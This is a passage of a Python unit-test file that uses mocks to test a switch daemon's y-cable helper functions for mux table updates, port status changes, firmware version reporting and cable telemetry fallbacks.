            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_invalid_model_port_info(self):
    """Unrecognized model value: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'Microsoft', 'model': 'bad_model1'}
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_update_mux_table_entry_module_dir_none(self):
    """Vendor-mapping lookup yielding None: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'not_Microsoft', 'model': 'simulated'}
        with patch('sonic_y_cable.y_cable_vendor_mapping.mapping') as mock_mapping:
            # No vendor directory known for this manufacturer.
            mock_mapping.get.return_value = None
            result = check_identifier_presence_and_update_mux_table_entry(
                state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
                asic_index, "Ethernet0", y_cable_presence)
            assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('sonic_y_cable.y_cable_vendor_mapping.mapping.get', MagicMock(return_value={"Microsoft": {"module": "test_module"}}))
def test_check_identifier_presence_and_update_mux_table_entry_module_none(self):
    """Vendor mapping present but no module for this model: helper returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = True
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'not_Microsoft', 'model': 'model1'}
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('sonic_y_cable.y_cable_vendor_mapping.mapping.get', MagicMock(return_value={"simulated": "microsoft.y_cable_simulated"}))
def test_check_identifier_presence_and_update_mux_table_entry_module_microsoft(self):
    """Recognized microsoft/simulated cable with presence flag set: returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = [True]
    y_cable_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], swsscommon.STATE_HW_MUX_CABLE_TABLE_NAME)}
    static_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)}
    mux_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], MUX_CABLE_INFO_TABLE)}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'microsoft', 'model': 'simulated'}
        sys.modules['builtins.getattr'] = MagicMock()
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('sonic_y_cable.y_cable_vendor_mapping.mapping.get', MagicMock(return_value={"simulated": "microsoft.y_cable_simulated"}))
def test_check_identifier_presence_and_update_mux_table_entry_module_microsoft_y_cable_presence_false(self):
    """Recognized cable but presence flag initially False: returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = [False]
    # Only the port table is populated for this scenario; the other
    # table dicts are passed empty.
    y_cable_tbl = {}
    static_tbl = {}
    mux_tbl = {}
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
        patched_util.get_transceiver_info_dict.return_value = {
            'manufacturer': 'microsoft', 'model': 'simulated'}
        sys.modules['builtins.getattr'] = MagicMock()
        result = check_identifier_presence_and_update_mux_table_entry(
            state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl,
            asic_index, "Ethernet0", y_cable_presence)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_delete_mux_table_entry(self):
    """Deleting a mux table entry with a pending change event: returns None."""
    asic_index = 0
    test_db = "TEST_DB"
    state_db = {}
    y_cable_presence = [True]
    delete_change_event = [True]
    port_tbl = {asic_index: swsscommon.Table(
        test_db[asic_index], "PORT_INFO_TABLE")}
    port_tbl[asic_index].get.return_value = (
        True, [('state', "auto"), ('read_side', 1)])
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
        result = check_identifier_presence_and_delete_mux_table_entry(
            state_db, port_tbl, asic_index, "Ethernet0",
            y_cable_presence, delete_change_event)
        assert result is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('swsscommon.swsscommon.Table')
def test_init_ports_status_for_y_cable(self, platform_chassis, platform_sfp, mock_swsscommon_table):
platform_sfp = MagicMock()
platform_chassis = MagicMock()
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_swsscommon_table.return_value = mock_table
rc = init_ports_status_for_y_cable(platform_sfp, platform_chassis,
y_cable_presence, stop_event=threading.Event())
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('swsscommon.swsscommon.Table')
def test_change_ports_status_for_y_cable_change_event(self, mock_swsscommon_table):
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
logical_port_dict = {'Ethernet0': '1'}
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
change_ports_status_for_y_cable_change_event(
logical_port_dict, y_cable_presence, stop_event=threading.Event())
mock_swsscommon_table.assert_called()
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('swsscommon.swsscommon.Table')
def test_change_ports_status_for_y_cable_change_event_sfp_removed(self, mock_swsscommon_table):
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
logical_port_dict = {'Ethernet0': '1'}
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
change_ports_status_for_y_cable_change_event(
logical_port_dict, y_cable_presence, stop_event=threading.Event())
mock_swsscommon_table.assert_called()
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('swsscommon.swsscommon.Table')
def test_change_ports_status_for_y_cable_change_event_sfp_unknown(self, mock_swsscommon_table):
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
logical_port_dict = {'Ethernet0': '2'}
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
change_ports_status_for_y_cable_change_event(
logical_port_dict, y_cable_presence, stop_event=threading.Event())
mock_swsscommon_table.assert_called()
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
def test_delete_ports_status_for_y_cable(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.logical.return_value = ['Ethernet0', 'Ethernet4']
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = delete_ports_status_for_y_cable()
mock_swsscommon_table.assert_called()
def test_check_identifier_presence_and_update_mux_info_entry(self):
asic_index = 0
logical_port_name = "Ethernet0"
state_db = {}
test_db = "TEST_DB"
mux_tbl = {}
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.logical.return_value = ['Ethernet0', 'Ethernet4']
rc = check_identifier_presence_and_update_mux_info_entry(
state_db, mux_tbl, asic_index, logical_port_name)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.download_firmware_status = 1
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == None)
assert(mux_info_dict['version_a_inactive'] == None)
assert(mux_info_dict['version_a_next'] == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict_asic_error(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.download_firmware_status = 1
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
swsscommon.Table.return_value.get.return_value = (
False, {"read_side": "2"})
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == "N/A")
assert(mux_info_dict['version_a_inactive'] == "N/A")
assert(mux_info_dict['version_a_next'] == "N/A")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict_download_status_failed_exception(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_FAILED = -1
port_instance.download_firmware_status = -1
port_instance.get_firmware_version = MagicMock(
side_effect=NotImplementedError)
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == "N/A")
assert(mux_info_dict['version_a_inactive'] == "N/A")
assert(mux_info_dict['version_a_next'] == "N/A")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict_download_status_failed(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_FAILED = -1
port_instance.download_firmware_status = -1
port_instance.get_firmware_version = MagicMock(
return_value={"version_active": "2021", "version_inactive": "2020", "version_next": "2022"})
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == "2021")
assert(mux_info_dict['version_a_inactive'] == "2020")
assert(mux_info_dict['version_a_next'] == "2022")
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    def test_get_muxcable_info(self, platform_sfputil):
        """get_muxcable_info on read_side "1" with a healthy stub driver:
        expects tor_active 'active', mux_direction 'self' and the stubbed
        internal voltage."""
        physical_port = 20
        logical_port_name = "Ethernet20"
        # Globally mocked swsscommon.Table: this ToR reads side "1".
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "1"})
        platform_sfputil.get_asic_id_for_logical_port = 0
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            # Stub y-cable driver returning fixed, healthy telemetry values.
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 1
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                    self.download_firmware_status = 0
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                def get_active_linked_tor_side(self):
                    return 1
                def get_mux_direction(self):
                    return 1
                def get_switch_count_total(self, switch_count):
                    return 1
                def get_eye_heights(self, tgt_tor):
                    return 500
                def is_link_active(self, tgt_nic):
                    return True
                def get_local_temperature(self):
                    return 22.75
                def get_local_voltage(self):
                    return 0.5
                def get_nic_voltage(self):
                    return 2.7
                def get_nic_temperature(self):
                    return 20
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_info(physical_port, logical_port_name)
                assert(rc['tor_active'] == 'active')
                assert(rc['mux_direction'] == 'self')
                assert(rc['internal_voltage'] == 0.5)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    def test_get_muxcable_info_peer_side(self, platform_sfputil):
        """get_muxcable_info when the state DB reports read_side "2": the same
        healthy driver stub should now be interpreted as standby/peer."""
        physical_port = 20
        logical_port_name = "Ethernet20"
        platform_sfputil.get_asic_id_for_logical_port = 0
        # Globally mocked swsscommon.Table: this ToR reads side "2".
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "2"})
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            # Stub y-cable driver returning fixed, healthy telemetry values.
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 1
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                    self.download_firmware_status = 0
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                def get_active_linked_tor_side(self):
                    return 1
                def get_mux_direction(self):
                    return 1
                def get_switch_count_total(self, switch_count):
                    return 1
                def get_eye_heights(self, tgt_tor):
                    return 500
                def is_link_active(self, tgt_nic):
                    return True
                def get_local_temperature(self):
                    return 22.75
                def get_local_voltage(self):
                    return 0.5
                def get_nic_voltage(self):
                    return 2.7
                def get_nic_temperature(self):
                    return 20
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_info(physical_port, logical_port_name)
                assert(rc['tor_active'] == 'standby')
                assert(rc['mux_direction'] == 'peer')
                assert(rc['internal_voltage'] == 0.5)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_info_exceptions(self, platform_sfputil):
        """get_muxcable_info with a broken driver stub: several helper methods
        deliberately omit `self`, so calling them on the instance raises
        TypeError and the fields fall back to 'unknown' / 'N/A'."""
        physical_port = 20
        logical_port_name = "Ethernet20"
        platform_sfputil.get_asic_id_for_logical_port = 0
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            # Stub driver whose zero-argument methods are unbound-callable
            # only; invoking them as instance methods raises TypeError.
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 1
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                    self.download_firmware_status = 0
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                def get_active_linked_tor_side():
                    return 1
                def get_mux_direction():
                    return 1
                def get_switch_count_total(self, switch_count):
                    return 1
                def get_eye_heights(tgt_tor):
                    return 500
                def is_link_active(self, tgt_nic):
                    return True
                def get_local_temperature():
                    return 22.75
                def get_local_voltage():
                    return 0.5
                def get_nic_voltage():
                    return 2.7
                def get_nic_temperature():
                    return 20
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_info(physical_port, logical_port_name)
                assert(rc['tor_active'] == 'unknown')
                assert(rc['mux_direction'] == 'unknown')
                assert(rc['self_eye_height_lane1'] == 'N/A')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_info_true_exceptions_peer_side(self, platform_sfputil):
        """get_muxcable_info on read_side "2" with a driver stub whose methods
        all raise NotImplementedError: fields should fall back to
        'unknown' / 'N/A'."""
        physical_port = 20
        logical_port_name = "Ethernet20"
        platform_sfputil.get_asic_id_for_logical_port = 0
        # Globally mocked swsscommon.Table: this ToR reads side "2".
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "2"})
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            # Stub driver that raises NotImplementedError from every
            # telemetry accessor.
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 1
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                    self.download_firmware_status = 0
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                def get_active_linked_tor_side(self):
                    raise NotImplementedError
                def get_mux_direction(self):
                    raise NotImplementedError
                def get_switch_count_total(self, switch_count):
                    raise NotImplementedError
                def get_eye_heights(self, tgt_tor):
                    raise NotImplementedError
                def is_link_active(self, tgt_nic):
                    return False
                def get_local_temperature(self):
                    raise NotImplementedError
                def get_local_voltage(self):
                    raise NotImplementedError
                def get_nic_voltage(self):
                    raise NotImplementedError
                def get_nic_temperature(self):
                    raise NotImplementedError
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_info(physical_port, logical_port_name)
                assert(rc['tor_active'] == 'unknown')
                assert(rc['mux_direction'] == 'unknown')
                assert(rc['self_eye_height_lane1'] == 'N/A')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_info_true_exceptions(self, platform_sfputil):
        """get_muxcable_info with a driver stub whose methods all raise
        NotImplementedError: fields should fall back to 'unknown' / 'N/A'."""
        physical_port = 20
        logical_port_name = "Ethernet20"
        platform_sfputil.get_asic_id_for_logical_port = 0
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            # Stub driver that raises NotImplementedError from every
            # telemetry accessor.
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 1
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                    self.download_firmware_status = 0
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                def get_active_linked_tor_side(self):
                    raise NotImplementedError
                def get_mux_direction(self):
                    raise NotImplementedError
                def get_switch_count_total(self, switch_count):
                    raise NotImplementedError
                def get_eye_heights(self, tgt_tor):
                    raise NotImplementedError
                def is_link_active(self, tgt_nic):
                    return False
                def get_local_temperature(self):
                    raise NotImplementedError
                def get_local_voltage(self):
                    raise NotImplementedError
                def get_nic_voltage(self):
                    raise NotImplementedError
                def get_nic_temperature(self):
                    raise NotImplementedError
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_info(physical_port, logical_port_name)
                assert(rc['tor_active'] == 'unknown')
                assert(rc['mux_direction'] == 'unknown')
                assert(rc['self_eye_height_lane1'] == 'N/A')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_info_exceptions_peer_side(self, platform_sfputil):
        """get_muxcable_info on read_side "2" with a broken driver stub:
        several helper methods deliberately omit `self`, so calling them on
        the instance raises TypeError and the fields fall back to
        'unknown' / 'N/A'."""
        physical_port = 20
        logical_port_name = "Ethernet20"
        platform_sfputil.get_asic_id_for_logical_port = 0
        # Globally mocked swsscommon.Table: this ToR reads side "2".
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "2"})
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            # Stub driver whose zero-argument methods are unbound-callable
            # only; invoking them as instance methods raises TypeError.
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
                    self.TARGET_NIC = 1
                    self.TARGET_TOR_A = 1
                    self.TARGET_TOR_B = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                    self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                    self.download_firmware_status = 0
                    self.SWITCH_COUNT_MANUAL = "manual"
                    self.SWITCH_COUNT_AUTO = "auto"
                def get_active_linked_tor_side():
                    return 1
                def get_mux_direction():
                    return 1
                def get_switch_count_total(self, switch_count):
                    return 1
                def get_eye_heights(tgt_tor):
                    return 500
                def is_link_active(self, tgt_nic):
                    return True
                def get_local_temperature():
                    return 22.75
                def get_local_voltage():
                    return 0.5
                def get_nic_voltage():
                    return 2.7
                def get_nic_temperature():
                    return 20
            patched_util.get.return_value = PortInstanceHelper()
            with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
                patched_util.get_asic_id_for_logical_port.return_value = 0
                rc = get_muxcable_info(physical_port, logical_port_name)
                assert(rc['tor_active'] == 'unknown')
                assert(rc['mux_direction'] == 'unknown')
                assert(rc['self_eye_height_lane1'] == 'N/A')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
    def test_get_muxcable_static_info(self, platform_sfputil):
        """get_muxcable_static_info on read_side "1": the per-target cursor
        values from the stub driver should land in the nic/tor_self/tor_peer
        lane fields, with read_side reported as 'tor1'."""
        physical_port = 0
        logical_port_name = "Ethernet0"
        platform_sfputil.get_asic_id_for_logical_port = 0
        # Globally mocked swsscommon.Table: this ToR reads side "1".
        swsscommon.Table.return_value.get.return_value = (
            True, {"read_side": "1"})
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            class PortInstanceHelper():
                def __init__(self):
                    self.EEPROM_ERROR = -1
